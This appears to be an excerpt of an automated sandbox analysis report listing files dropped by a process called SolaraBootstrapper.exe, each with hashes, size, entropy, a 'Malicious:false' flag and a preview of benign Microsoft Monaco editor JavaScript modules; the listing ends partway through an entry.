                                                  SHA1:C48FED5485D2410901282F7A27CF674A1D5E7D97
                                                  SHA-256:6F33C33A4EFE691E75008435430C80BD76F8B88726F69E4C22582A16D6A4A135
                                                  SHA-512:D471BBD73FA6390A28218A9826C1BF990DEF1ADCFA1917086261AF77D04355009AA66545AC6B77E58F3A93A5C18DA258E1555842FCF205B768BAA45401FA2B5A
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/json/jsonWorker", ["require","require"],(require)=>{.var moduleExports=(()=>{var lt=Object.defineProperty;var Hr=Object.getOwnPropertyDescriptor;var Gr=Object.getOwnPropertyNames;var Xr=Object.prototype.hasOwnProperty;var Zr=(t,r)=>{for(var i in r)lt(t,i,{get:r[i],enumerable:!0})},Qr=(t,r,i,e)=>{if(r&&typeof r=="object"||typeof r=="function")for(let n of Gr(r))!Xr.call(t,n)&&n!==i&&lt(t,n,{get:()=>r[n],enumerable:!(e=Hr(r,n))||e.enumerable});return t};var Yr=t=>Qr(lt({},"__esModule",{value:!0}),t);var _n={};Zr(_n,{JSONWorker:()=>st,create:()=>Bn});function Pe(t,r){r===void
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (9629)
                                                  Category:dropped
                                                  Size (bytes):23674
                                                  Entropy (8bit):5.285703965037481
                                                  Encrypted:false
                                                  SSDEEP:384:GPWM9xPrt4cS7Z/45e+tbxGw5gcD/Hpx2+MnOgxoiZI0ySrwrHr8VjnBFHfyMV9g:mWM9xPrt4cS7Z/45e+tHJ/Hqny+yrHII
                                                  MD5:0B9FC31A9418E3B934A5605621434A9B
                                                  SHA1:CC6A27B9C97B78F4B0A68433828756A8AAAC87B4
                                                  SHA-256:6404114A7EBDAF7F7F1ACA882219FD6CE140B20675003C6BBCE48154BA378053
                                                  SHA-512:F57B78C961AAE9E36D128A0FB89060F5297D9675972EA83E0E2D089E0D114BA1BEE086695EB8ACC4244EE3D5AABCDD84FEDB0CDE831A2CCD0F789A83B57E1D6F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/typescript/tsMode", ["require","require"],(require)=>{.var moduleExports=(()=>{var ee=Object.create;var I=Object.defineProperty;var te=Object.getOwnPropertyDescriptor;var ie=Object.getOwnPropertyNames;var re=Object.getPrototypeOf,se=Object.prototype.hasOwnProperty;var ne=(s,e,t)=>e in s?I(s,e,{enumerable:!0,configurable:!0,writable:!0,value:t}):s[e]=t;var $=(s=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(s,{get:(e,t)=>(typeof require!="undefined"?require:e)[t]}):s)(function(s){if(typeof require!="undefined")return require.apply(this,arguments);th
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (19820)
                                                  Category:dropped
                                                  Size (bytes):4602226
                                                  Entropy (8bit):5.442770071598513
                                                  Encrypted:false
                                                  SSDEEP:49152:fIxqCQX8aby5XNtwJnnOidxPqmuCGCI22F6qWBxzpBYJvmFYH2ydMeplh/Av3qBv:gxqCW8MjPqw0R
                                                  MD5:BFDDF2CF657E191A9899AA9EC2CCECD5
                                                  SHA1:9083345F041A4DFE01A1D800C9D2C34460D4BC1F
                                                  SHA-256:CA6E2BDB4F8DD9A39E2B9EA3336AB98B3B46DF5803053BA658DB3E862CEB18B0
                                                  SHA-512:AB186ED59B7F9647875F3418782334178BC212A4B1177921D7951E740DBB888766202339B4BC8F592784C71AC130381BA9D3AD3B37BB7BC888E29B323742CC26
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/typescript/tsWorker", ["require","require"],(require)=>{.var moduleExports=(()=>{var rae=Object.defineProperty;var hit=Object.getOwnPropertyDescriptor;var git=Object.getOwnPropertyNames;var yit=Object.prototype.hasOwnProperty;var hke=(lp,ti)=>{for(var gt in ti)rae(lp,gt,{get:ti[gt],enumerable:!0})},vit=(lp,ti,gt,hs)=>{if(ti&&typeof ti=="object"||typeof ti=="function")for(let Mo of git(ti))!yit.call(lp,Mo)&&Mo!==gt&&rae(lp,Mo,{get:()=>ti[Mo],enumerable:!(hs=hit(ti,Mo))||hs.enumerable});return lp};var bit=lp=>vit(rae({},"__esModule",{value:!0}),lp);var kit={};hke(kit,{TypeScr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (11118)
                                                  Category:dropped
                                                  Size (bytes):30051
                                                  Entropy (8bit):5.29773768316631
                                                  Encrypted:false
                                                  SSDEEP:768:mmJlCRErW8SKOdbD1dbftEDRalnTQIAZHQAn+9OtNvTQ2knuKn6GB1oZmbCJoV1Q:Vw/8chlTxN6emORWd3
                                                  MD5:C5FA9066F8224F11B43AA4308668EB94
                                                  SHA1:01A7D50BF8467937DD2AFEB39E061439472BB4E1
                                                  SHA-256:EFFAB18AFBB4297A23D9D98BE95672E4088C735A0677993C329CF29B48914AED
                                                  SHA-512:07EC139827E1684C54E109F9D592BE7281DB97ABB59558332D2801A59022AAE9C18BFD746CB58865F31FEA2501CC5FC6B9DF671347C2C661502385FF31F362F7
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/const _amdLoaderGlobal=this,_commonjsGlobal=typeof global=="object"?global:{};var AMDLoader;(function(u){u.global=_amdLoaderGlobal;class y{get isWindows(){return this._detect(),this._isWindows}get isNode(){return this._detect(),this._isNode}get isElectronRenderer(){return this._detect(),this._isElectronRenderer}get isWebWorker(){return this._detect(),this._isWebWorker}get isElectronNodeIntegrationWebWorker(){return this._detect(),this._isElectronNodeIntegrationWebWorker}constructor(){this._detected=!1,this._isWindows=!1,this._isNode=!1,this._isElectronRenderer=!1,this._isWebWorker=!1,this._isElectronNodeIntegrationWebWorker=!1}_detect()
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1024)
                                                  Category:dropped
                                                  Size (bytes):153173
                                                  Entropy (8bit):5.34638278499734
                                                  Encrypted:false
                                                  SSDEEP:1536:XNSxrkwnz+dTHHfvYYdBwDZ2Ogvh52xgh2hQXIvTBaB7hU74Yc6aphU1PblosJEl:XzdTagJkb+6jFlJJEt9yjjTCD2zw
                                                  MD5:27EAD90C7702154755785E0E53398755
                                                  SHA1:86B59485FE6F6CCB1805183FA75062A2AC1C859E
                                                  SHA-256:BDF9433692A08851E13DD58504EEF19F51BD2EC7241923A68EDF5772E0E53AF5
                                                  SHA-512:6829681575179C90BB7817B17FEEE60E7D44D8ABB15264AB39D7F0EDF95DD1D030B99C12B005C753CD786C26CE6F17FF09B058C16F3363596F785E386EF78E82
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.(function(){.var e=["exports","require","vs/editor/common/core/position","vs/base/common/winjs.base","vs/base/common/errors","vs/base/common/platform","vs/base/common/uri","vs/editor/common/core/range","vs/editor/common/core/uint","vs/base/common/event","vs/base/common/lifecycle","vs/base/common/cancellation","vs/base/common/functional","vs/base/common/diff/diff","vs/base/common/async","vs/base/common/map","vs/base/common/strings","vs/editor/common/model/mirrorTextModel","vs/base/common/linkedList","vs/base/common/keyCodes","vs/editor/common/core/selection","vs/editor/common/core/token","vs/base/common/diff/diffChange","vs/editor/common/core/char
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1818)
                                                  Category:dropped
                                                  Size (bytes):2225
                                                  Entropy (8bit):5.391520648341645
                                                  Encrypted:false
                                                  SSDEEP:48:hFDMgRs/i4+GK5w0V1+T01+BueGB3j4ly0/eX1HroHrb4rHK9mIP1HWm:hFDMgRsk/vV1+I1+oB3j4ly0/YNrarkO
                                                  MD5:4CB475399C4490EEA41982DCD6D9653E
                                                  SHA1:FC97D57206FF7FA1C89FF0FC9F6E2F04A20EA185
                                                  SHA-256:9BCA42394FE8922FEC24B768EEB8CE04692DE6FAD82F9052D5B7E70F5C6B0F40
                                                  SHA-512:27EEFE83CF38A7D784414D99B472F6FCD7E595691EB0F368254BA1F71AAF702840B62BF232C30C515A8FADA234699FEFEEF496C0C24669CC158CB567227E4783
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/bat/bat",["require","exports"],function(e,s){"use strict";Object.defineProperty(s,"__esModule",{value:!0}),s.conf={comments:{lineComment:"REM"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'}],surroundingPairs:[{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'}],folding:{markers:{start:new RegExp("^\\s*(::\\s*|REM\\s+)#region"),end:new RegExp("^\\s*(::\\s*|REM\\s+)#endregion")}}},s.language={defaultToken:"",ignoreCase:!0,tokenPostfix:".bat",brackets:[{tok
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3569)
                                                  Category:dropped
                                                  Size (bytes):3976
                                                  Entropy (8bit):5.237312517263243
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRspI0xqmV1+/0V1+/Lq1S8YLYGbSiv5vjmtMzkJgd+fcAr6fPlW:hZaqixziiihjmtykJbcAr6fc
                                                  MD5:9D0C4AC1691EED0A480C3E9246490D29
                                                  SHA1:38258864FD070C35CEC6B68715D58771DF9FE3E1
                                                  SHA-256:E706C9F8E5C5A0CB01B2F4E4879EC34A050D6EB2A8840284EB7BADD9D78099F9
                                                  SHA-512:437A703607A9F0CB96FFB56312D149B95F596290591D14098C36D978B2E1FDBA3C3712C9099923BC0A709C5C0EBD7EEA868F63DFBCC69CDF5A9325B8A67006B6
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/coffee/coffee",["require","exports"],function(e,r){"use strict";Object.defineProperty(r,"__esModule",{value:!0}),r.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\#%\^\&\*\(\)\=\$\-\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\?\s]+)/g,comments:{blockComment:["###","###"],lineComment:"#"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],fo
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5095)
                                                  Category:dropped
                                                  Size (bytes):5502
                                                  Entropy (8bit):5.170848003102142
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRs/rbV1+gqVV1+/LVb9ZRC2seM6jjz13MwVcEghhb6Yw76wGcmvRBNIs:hZGrTOcVv5M61h8hSeiYL
                                                  MD5:0A16509E6CD0155FB622E785CFE976C7
                                                  SHA1:7AFA7F823191C43D7A4BDD7D91577495DE62C21A
                                                  SHA-256:A7C2BEA7CA3D9E203A3A286735945FE010C8F4F8D46620386EE8BEFC6A78B32B
                                                  SHA-512:2CBC48CB10C467561C6A84F59405E9C2F864640B3A21E6FE5CD14AD1A7CA5667B766B3C0511DF26F28205DD17338A878BD1164A4F5875235A73214F3E4AEB49D
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/cpp/cpp",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"[",close:"]"},{open:"{",close:"}"},{open:"(",close:")"},{open:"'",close:"'",notIn:["string","comment"]},{open:'"',close:'"',notIn:["string"]}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],folding:{markers:{start:new RegExp("^\\s*#pragma\\s+region\\b"),e
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4514)
                                                  Category:dropped
                                                  Size (bytes):4921
                                                  Entropy (8bit):5.140618669527192
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsVx+rbV1+gqGV1+hmQuq1cBh8b7gj8/pLxb6J994wGcKU7dYIkI:hZi+rTtPsRXpw9SiKUJGI
                                                  MD5:F8F841D13C9220E15DCD6BC386B37BA2
                                                  SHA1:2B8B7003820D19ED83AFDE98C845DB5E3D5753F8
                                                  SHA-256:6B3BE9A86EE8E3202F51745D94D24CC1EEFBCF7D9E6D94FBAF70146B084E835F
                                                  SHA-512:0B167865B8D7847792C80144E83BDF33655DB6ECC0934BB3290F8B5793FEE8168AEAF9D74B3541A9424C4F180AAD496C2D8710E3847A5BF9D4B2C960DDEA4AE5
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/csharp/csharp",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\#\$\%\^\&\*\(\)\-\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\?\s]+)/g,comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:"'",close:"'",notIn:["string","comment"]},{open:'"',close:'"',notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",clos
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1392)
                                                  Category:dropped
                                                  Size (bytes):1799
                                                  Entropy (8bit):5.049655720842081
                                                  Encrypted:false
                                                  SSDEEP:24:hyiDMNbWRsIO3ymSh6pzPmbMjVS5u4334bdPRtZRXxFLMiqkvGbA:hFDMgRs/R06Veb64u43IbLRhFLYDbA
                                                  MD5:22ADA25D590811DCFF4E5F5D698E583B
                                                  SHA1:C43D4846967D5037EF05B102E49D1FBC54E45FBC
                                                  SHA-256:4B5A5D7D50986B86B00833447E097C0F01A4388CE1765B48E7E371D06E3A4789
                                                  SHA-512:C8373EA0B78114F82E8BF027473F72ADA0D8ACD51623152A0072111D8B3B7D5AC310A1CC510C4E4CD2E97A7686DB3C87B2DA675FC910898BD11108E4B50ED189
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/csp/csp",["require","exports"],function(t,e){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.conf={brackets:[],autoClosingPairs:[],surroundingPairs:[]},e.language={keywords:[],typeKeywords:[],tokenPostfix:".csp",operators:[],symbols:/[=><!~?:&|+\-*\/\^%]+/,escapes:/\\(?:[abfnrtv\\"']|x[0-9A-Fa-f]{1,4}|u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8})/,tokenizer:{root:[[/child-src/,"string.quote"],[/connect-src/,"string.quote"],[/default-src/,"string.quote"],[/font-src/,"string.quote"],[/frame-src/,"string.quote"],[/img-src/,"string.quote"],[/manifest-src/,"stri
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4462)
                                                  Category:dropped
                                                  Size (bytes):4869
                                                  Entropy (8bit):5.173250596089998
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsozIq+q17qcq6V1+/aMj1cqTroIrqjKf8O3lzXY0Jc:hZzzv9VmjoOf8O39XbJc
                                                  MD5:49AD30F1151CFD7A74677FDC6DD13DA9
                                                  SHA1:286D47F0A4CFA26DA2E4D1F1317A8C87000BB5FC
                                                  SHA-256:BD331FD3BD2C37B0C3150035325F163AC9266BF6D942310764815E676D856D91
                                                  SHA-512:7337706BFD5BD54938DA0FBA35E97F8E5780491C04B58D43FC6D905BD2DCA92897F1ED8D48E42665F166DA7684CC6E29A63AE73F8D3779A9FEB97C397A642F0D
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/css/css",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={wordPattern:/(#?-?\d*\.\d\w*%?)|((::|[@#.!:])?[\w-?]+%?)|::|[@#.!:]/g,comments:{blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]},{open:'"',close:'"',notIn:["string","comment"]},{open:"'",close:"'",notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:"}"},{open:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1982)
                                                  Category:dropped
                                                  Size (bytes):2389
                                                  Entropy (8bit):5.339380212705139
                                                  Encrypted:false
                                                  SSDEEP:48:hFDMgRs/L+v0V1+/n0V1+/JmM7LSKoemBjrBdOuWI5w3I58ud:hFDMgRsS8V1+/0V1+/HKhRry3EEE80
                                                  MD5:E32DE981BDAF75E6FFB8FE40BC955A68
                                                  SHA1:BEF1AF7B26EA01C987C7A6295BB7192D83A32068
                                                  SHA-256:65B86FC54E9B35D6CB84F01DFB905680DBCAD6605757DE1D6BCA84E3029889AF
                                                  SHA-512:A3EADD8C1389DFF6C2C6E595EFFF69BE3A573D01E4E16B8E4A8B28F63E4C48C9C439B5DD93666D81D703D1C6B5BF927CC8E47D04AF270128095F0D579407C2F4
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/dockerfile/dockerfile",["require","exports"],function(e,s){"use strict";Object.defineProperty(s,"__esModule",{value:!0}),s.conf={brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},s.language={defaultToken:"",tokenPostfix:".dockerfile",instructions:/FROM|MAINTAINER|RUN|EXPOSE|ENV|ADD|ARG|VOLUME|LABEL|USER|WORKDIR|COPY|CMD|STOP
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2924)
                                                  Category:dropped
                                                  Size (bytes):3331
                                                  Entropy (8bit):5.199887618636656
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsTryV1+IV1+/PRdL4a5Ag7xwGGBdcl:hZ6rOjY7sgFaY
                                                  MD5:DE122B3BC44A8714F386DC80282DCB12
                                                  SHA1:06888A9B616993E9AF9797CEC64C6D419065F2CB
                                                  SHA-256:1390079BABC117D3F376735780D98F409F317EB4628D17106642C6933EA1DA7F
                                                  SHA-512:AB48F2E5BFA6EA0024530141BB5D35B9090EE0254A3E8F8B86FA36CC8C2FCA8000A3CAAFCFFFC1D83E21C488E1F1990C91F537290B54FBBCA1D3C7BE090DFBA5
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/fsharp/fsharp",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"//",blockComment:["(*","*)"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],folding:{markers:{start:new RegExp("^\\s*//\\s*#region\\b|^\\s*\\(\\*\\s*#region(.*)\\*\\)"),end:new RegExp("^\\s*//\\s*#end
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2628)
                                                  Category:dropped
                                                  Size (bytes):3035
                                                  Entropy (8bit):5.201275188030444
                                                  Encrypted:false
                                                  SSDEEP:48:hFDMgRs/T2K5rDQ0V1+CnWn600V1+j/goO6LKMAnJILi/3+vb6jxF6WwGcuVOOvp:hFDMgRs7rbV1+OK6V1+j/o6LKMAnuLfm
                                                  MD5:5B4484C914CD97AFF4510B803F2517EF
                                                  SHA1:8F275AC36C57C4C464E30F92F525FFBD0FD436C6
                                                  SHA-256:46D1757C3CD3DBC3C7B465A338880144922A1C34C30E36F06FF2DB8C2FF75B86
                                                  SHA-512:B34C64F9997F4B72760ECA270D2A0C2E22D83467D3F0BC82E7C0E63D62D8F9D74A144A28D676A223CDEFEF417AF723801AC0535375D0DD64BB3A81E87617FED0
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/go/go",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:"`",close:"`",notIn:["string"]},{open:'"',close:'"',notIn:["string"]},{open:"'",close:"'",notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:"`",close:"`"},{open:'"',close:'"'},{open:"'",close:"'"}]},n.langu
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (6121)
                                                  Category:dropped
                                                  Size (bytes):6528
                                                  Entropy (8bit):5.291705997818562
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRspITV1+/I/+B1BerJzlWK2BZwIBTIwbcdg6EHpf4Og6E8S6g6EB+FpAjE3:hZhbYbQRld2BZ1O0p4OE60+dMZLDs
                                                  MD5:3CA7CF83292B56444548F2914C0E1811
                                                  SHA1:4BE5B1ADAA187D82A94967E6960D811ACD700B93
                                                  SHA-256:31D25588D120E7C79F3332FF3B3C794CEBD0554C7578E3BB37B3CAC366E4F6C2
                                                  SHA-512:2D337B64DEF0D42F8BD6476CF31E806F67F77D26C95C68E75574FC310F7974852A810F8B197238559A2CB20D07914DE5844481477321CDCB2C68C47DA9088EB8
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/handlebars/handlebars",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n="undefined"==typeof monaco?self.monaco:monaco,a=["area","base","br","col","embed","hr","img","input","keygen","link","menuitem","meta","param","source","track","wbr"];t.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\$\^\&\*\(\)\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\s]+)/g,comments:{blockComment:["{{!--","--}}"]},brackets:[["\x3c!--","--\x3e"],["<",">"],["{{","}}"],["{","}"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (4525)
                                                  Category:dropped
                                                  Size (bytes):4932
                                                  Entropy (8bit):5.307991602842183
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsfInV1+/6mQVV1+HBwBRl0GSytHd6EHaK4T6Ef6EByyEhcKMgEQEJWf:hZLP+4+GLl0GSytHLaK4ccKM2
                                                  MD5:630FA41F59A189AED68B4DB82559DE95
                                                  SHA1:14A527D27240BA0EFFCFA43A5C46B9289E96B822
                                                  SHA-256:C717AC0701D3B1E22DC52A0C53608214297E5FAB7BC7011CF4E964F2ECA9D62F
                                                  SHA-512:E15C602788F13AFD1E19E5F82DE7A35EB9656950553BC3913205BA3E70DDF87199B7F9B358DB7B7704EFD3DC85029AD277692B6B84F5F549964B9DD7CCE1AD60
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/html/html",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n="undefined"==typeof monaco?self.monaco:monaco,i=["area","base","br","col","embed","hr","img","input","keygen","link","menuitem","meta","param","source","track","wbr"];t.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\$\^\&\*\(\)\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\s]+)/g,comments:{blockComment:["\x3c!--","--\x3e"]},brackets:[["\x3c!--","--\x3e"],["<",">"],["{","}"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1074)
                                                  Category:dropped
                                                  Size (bytes):1481
                                                  Entropy (8bit):5.244494288608599
                                                  Encrypted:false
                                                  SSDEEP:24:hyiDMNbWRsIO3Sm6bTK5e+emh0V1+/n0V1+/VDnVx7sMRLk6swZ:hFDMgRs/x2K5eu0V1+/n0V1+/FB60Z
                                                  MD5:B9252B74381FE17565D494711F4C9093
                                                  SHA1:9ED6A00A166C0B5ABDBB3EA45FA7DF3A5DEFC8EE
                                                  SHA-256:1F0FEEAE58C32F6E1F31B78F7E2AAB3C91DA387E464234C0F55EBFF0E77444A2
